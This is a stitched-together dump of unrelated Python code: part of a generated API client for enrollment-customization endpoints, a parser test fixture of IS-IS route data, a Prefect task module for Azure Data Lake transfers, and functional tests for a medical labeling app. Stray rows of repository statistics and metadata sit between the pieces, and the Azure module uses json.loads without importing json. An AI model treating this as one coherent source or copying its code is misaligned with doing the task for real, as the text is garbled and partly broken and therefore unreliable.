:rtype: tuple(GetEnrollmentCustomizationPanelText, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'enrollment_customization_panel_text'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_post`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_text' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_text' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_text'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_text` when calling `v1_enrollment_customization_id_text_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_text' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_text']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
201: "GetEnrollmentCustomizationPanelText",
400: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_parse_markdown_post(self, markdown, **kwargs): # noqa: E501
        """Parse the given string as markdown text and return HTML output # noqa: E501
        Parse the given string as markdown text and return HTML output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_parse_markdown_post(markdown, async_req=True)
>>> result = thread.get()
        :param markdown: The markdown string to be parsed (required)
        :type markdown: Markdown
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Markdown
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_parse_markdown_post_with_http_info(markdown, **kwargs) # noqa: E501
def v1_enrollment_customization_parse_markdown_post_with_http_info(self, markdown, **kwargs): # noqa: E501
        """Parse the given string as markdown text and return HTML output # noqa: E501
        Parse the given string as markdown text and return HTML output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_parse_markdown_post_with_http_info(markdown, async_req=True)
>>> result = thread.get()
        :param markdown: The markdown string to be parsed (required)
        :type markdown: Markdown
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
        :param _request_timeout: timeout setting for this request. If a single
                                 number is provided, it will be the total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
                              request; this effectively ignores the authentication
                              in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Markdown, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'markdown'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_parse_markdown_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'markdown' is set
if self.api_client.client_side_validation and ('markdown' not in local_var_params or # noqa: E501
local_var_params['markdown'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `markdown` when calling `v1_enrollment_customization_parse_markdown_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'markdown' in local_var_params:
body_params = local_var_params['markdown']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "Markdown",
}
return self.api_client.call_api(
'/v1/enrollment-customization/parse-markdown', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 49.212407 | 342 | 0.620373 | 14,138 | 125,344 | 5.205616 | 0.017258 | 0.11188 | 0.055736 | 0.053562 | 0.984714 | 0.984565 | 0.983872 | 0.982051 | 0.982051 | 0.979116 | 0 | 0.014185 | 0.314383 | 125,344 | 2,546 | 343 | 49.231736 | 0.842212 | 0.473393 | 0 | 0.786596 | 0 | 0 | 0.212847 | 0.107062 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030864 | false | 0 | 0.004409 | 0 | 0.066138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"tag": {
"1": {
"prefix": {
"1.1.1.0": {
"subnet": "24",
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"via_interface": {
"Tunnel65537": {
"distance": 115,
"route_type": "L2",
"metric": 50,
"via_ip": "6.6.6.6",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 221,
"rtp_lsp_index": 221,
"rtp_lsp_version": 99
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
},
"GigabitEthernet0/0/3": {
"distance": 115,
"route_type": "L2",
"metric": 67108866,
"via_ip": "12.12.12.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 30,
"rtp_lsp_version": 2034
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
},
"TenGigabitEthernet0/0/5": {
"distance": 115,
"route_type": "L2",
"metric": 67108866,
"via_ip": "13.13.1.2",
"src_ip": "5.5.5.5",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 37,
"rtp_lsp_index": 13,
"rtp_lsp_version": 2055
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
},
"GigabitEthernet0/0/2": {
"distance": 115,
"route_type": "L2",
"metric": 67108866,
"via_ip": "12.12.1.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 30,
"rtp_lsp_version": 2034
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
}
}
},
"2.2.2.0": {
"subnet": "24",
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"via_interface": {
"GigabitEthernet0/0/2": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.1.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 22,
"rtp_lsp_version": 2059
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"GigabitEthernet0/0/3": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.12.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 22,
"rtp_lsp_version": 2059
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"TenGigabitEthernet0/0/5": {
"distance": 115,
"route_type": "L2",
"metric": 50331662,
"via_ip": "13.13.1.2",
"src_ip": "5.5.5.5",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 37,
"rtp_lsp_index": 14,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
}
}
},
"2.2.3.0": {
"subnet": "24",
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"via_interface": {
"GigabitEthernet0/0/2": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.1.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 23,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"GigabitEthernet0/0/3": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.12.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 23,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"TenGigabitEthernet0/0/5": {
"distance": 115,
"route_type": "L2",
"metric": 50331662,
"via_ip": "13.13.1.2",
"src_ip": "5.5.5.5",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 37,
"rtp_lsp_index": 14,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
}
}
}
}
}
}
}
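# Sketch of how a golden output like this is typically consumed in a
# genieparser unit test (the parser class and device fixture below are
# assumptions based on the file path, not part of this module):
#
#   parsed = ShowIsisRib(device=device).parse()
#   assert parsed == expected_output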
import os
from datetime import timedelta
import pandas as pd
from prefect import Task
from prefect.tasks.secrets import PrefectSecret
from prefect.utilities.tasks import defaults_from_attrs
from ..sources import AzureDataLake
from .azure_key_vault import AzureKeyVaultSecret
class AzureDataLakeDownload(Task):
"""
Task for downloading data from the Azure Data lakes (gen1 and gen2).
Args:
from_path (str, optional): The path from which to download the file(s). Defaults to None.
to_path (str, optional): The destination path. Defaults to None.
recursive (bool, optional): Set this to true if downloading entire directories.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to fetch the secret. Defaults to None.
max_retries (int, optional): Maximum number of task retries. Defaults to 3.
retry_delay (timedelta, optional): Delay between retries. Defaults to timedelta(seconds=10).
"""
def __init__(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = False,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.from_path = from_path
self.to_path = to_path
self.recursive = recursive
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_download",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Download file(s) from the Azure Data Lake"""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"from_path",
"to_path",
"recursive",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> None:
"""Task run method.
Args:
from_path (str): The path from which to download the file(s).
to_path (str): The destination path.
recursive (bool): Set this to true if downloading entire directories.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
file_name = from_path.split("/")[-1]
to_path = to_path or file_name
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], from_path)
self.logger.info(f"Downloading data from {full_dl_path} to {to_path}...")
lake.download(from_path=from_path, to_path=to_path, recursive=recursive)
self.logger.info(f"Successfully downloaded data to {to_path}.")
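The credential-resolution logic in `run` (a Key Vault secret if one is available, environment variables otherwise) can be isolated as a small helper. This is a sketch of the same fallback pattern, not part of the viadot API:

```python
import json
import os


def resolve_credentials(secret_json: str = None) -> dict:
    """Return ADLS credentials from a secret JSON blob if given,
    otherwise fall back to environment variables (mirrors the task logic)."""
    if secret_json:
        return json.loads(secret_json)
    return {
        "ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
        "AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
        "AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
        "AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
    }
```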
class AzureDataLakeUpload(Task):
"""Upload file(s) to Azure Data Lake.
Args:
from_path (str, optional): The local path from which to upload the file(s). Defaults to None.
to_path (str, optional): The destination path. Defaults to None.
recursive (bool, optional): Set this to true if uploading entire directories. Defaults to False.
overwrite (bool, optional): Whether to overwrite files in the lake. Defaults to False.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
def __init__(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = False,
overwrite: bool = False,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.from_path = from_path
self.to_path = to_path
self.recursive = recursive
self.overwrite = overwrite
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_upload",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Upload file(s) to the Azure Data Lake"""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"from_path",
"to_path",
"recursive",
"overwrite",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = None,
overwrite: bool = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> None:
"""Task run method.
Args:
from_path (str): The path from which to upload the file(s).
to_path (str): The destination path.
recursive (bool): Set to true if uploading entire directories.
overwrite (bool): Whether to overwrite the file(s) if they exist.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_to_path = os.path.join(credentials["ACCOUNT_NAME"], to_path)
self.logger.info(f"Uploading data from {from_path} to {full_to_path}...")
lake.upload(
from_path=from_path,
to_path=to_path,
recursive=recursive,
overwrite=overwrite,
)
self.logger.info(f"Successfully uploaded data to {full_to_path}.")
class AzureDataLakeToDF(Task):
def __init__(
self,
path: str = None,
sep: str = "\t",
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
"""Load file(s) from the Azure Data Lake to a pandas DataFrame.
Currently supports CSV and parquet files.
Args:
path (str, optional): The path from which to load the DataFrame. Defaults to None.
sep (str, optional): The separator to use when reading a CSV file. Defaults to "\t".
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
self.path = path
self.sep = sep
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_to_df",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Load file(s) from the Azure Data Lake to a pandas DataFrame."""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"path",
"sep",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
path: str = None,
sep: str = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> pd.DataFrame:
"""Task run method.
Args:
path (str): The path to file(s) which should be loaded into a DataFrame.
sep (str): The field separator to use when loading the file to the DataFrame.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
if path is None:
raise ValueError("Please provide the path to the file to be downloaded.")
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials, path=path)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], path)
self.logger.info(f"Downloading data from {full_dl_path} to a DataFrame...")
df = lake.to_df(sep=sep)
self.logger.info("Successfully loaded data.")
return df
class AzureDataLakeCopy(Task):
"""
Task for copying files within the Azure Data Lake.
Args:
from_path (str, optional): The path from which to copy the file(s). Defaults to None.
to_path (str, optional): The destination path. Defaults to None.
recursive (bool, optional): Set this to true if copying entire directories.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to fetch the secret. Defaults to None.
max_retries (int, optional): Maximum number of task retries. Defaults to 3.
retry_delay (timedelta, optional): Delay between retries. Defaults to timedelta(seconds=10).
"""
def __init__(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = False,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.from_path = from_path
self.to_path = to_path
self.recursive = recursive
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_copy",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Copy file(s) from the Azure Data Lake"""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"from_path",
"to_path",
"recursive",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> None:
"""Task run method.
Args:
from_path (str): The path from which to copy the file(s).
to_path (str): The destination path.
recursive (bool): Set this to true if copying entire directories.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
file_name = from_path.split("/")[-1]
to_path = to_path or file_name
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], from_path)
self.logger.info(f"Copying data from {full_dl_path} to {to_path}...")
lake.cp(from_path=from_path, to_path=to_path, recursive=recursive)
self.logger.info(f"Successfully copied data to {to_path}.")
class AzureDataLakeList(Task):
"""
Task for listing files in Azure Data Lake.
Args:
path (str, optional): The path to the directory whose contents you want to list. Defaults to None.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to fetch the secret. Defaults to None.
max_retries (int, optional): Maximum number of task retries. Defaults to 3.
retry_delay (timedelta, optional): Delay between retries. Defaults to timedelta(seconds=10).
"""
def __init__(
self,
path: str = None,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.path = path
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_list",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
@defaults_from_attrs(
"path",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
path: str = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> list:
"""Task run method.
Args:
path (str): The path to the directory whose contents you want to list.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], path)
self.logger.info(f"Listing files in {full_dl_path}...")
files = lake.ls(path)
self.logger.info(f"Successfully listed files in {full_dl_path}.")
return files
# File: backend/tests/functional_tests/test_adding_new_label.py (repo: kolszewska/MedTagger, license: Apache-2.0)
"""Tests for adding new Labels to the system."""
import json
from typing import Any
from medtagger.storage.models import BrushLabelElement
from medtagger.definitions import LabelTool
from medtagger.repositories import (
datasets as DatasetsRepository,
label_tags as LabelTagsRepository,
tasks as TasksRepository,
)
from tests.functional_tests import get_api_client, get_headers
from tests.functional_tests.conftest import get_token_for_logged_in_user
def test_add_brush_label(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label made with Brush tool."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.BRUSH], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Brush
payload = {
'elements': [{
'slice_index': 0,
'width': 128,
'height': 128,
'image_key': 'SLICE_1',
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.BRUSH.value,
}],
'labeling_time': 12.34,
'task_id': TasksRepository.get_task_by_key('MARK_KIDNEYS').id,
}
with open('tests/assets/example_labels/binary_mask.png', 'rb') as image:
data = {
'label': json.dumps(payload),
'SLICE_1': (image, 'slice_1'),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 201
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_id = json_response['label_id']
assert isinstance(label_id, str)
assert len(label_id) >= 1
# Step 4. Fetch details about above Label and check image storage
response = api_client.get('/api/v1/labels/' + label_id, headers=get_headers(token=user_token))
assert response.status_code == 200
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_element_id = json_response['elements'][0]['label_element_id']
brush_label_element = BrushLabelElement.get(id=label_element_id)
assert brush_label_element.image
def test_add_point_label(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label made with Point tool."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.POINT], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Point Tool
payload = {
'elements': [{
'slice_index': 0,
'x': 0.25,
'y': 0.5,
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.POINT.value,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 201
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_id = json_response['label_id']
assert isinstance(label_id, str)
assert len(label_id) >= 1
# Step 4. Fetch details about above Label
response = api_client.get('/api/v1/labels/' + label_id, headers=get_headers(token=user_token))
assert response.status_code == 200
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
assert len(json_response['elements']) == 1
assert json_response['elements'][0]['x'] == 0.25
assert json_response['elements'][0]['y'] == 0.5
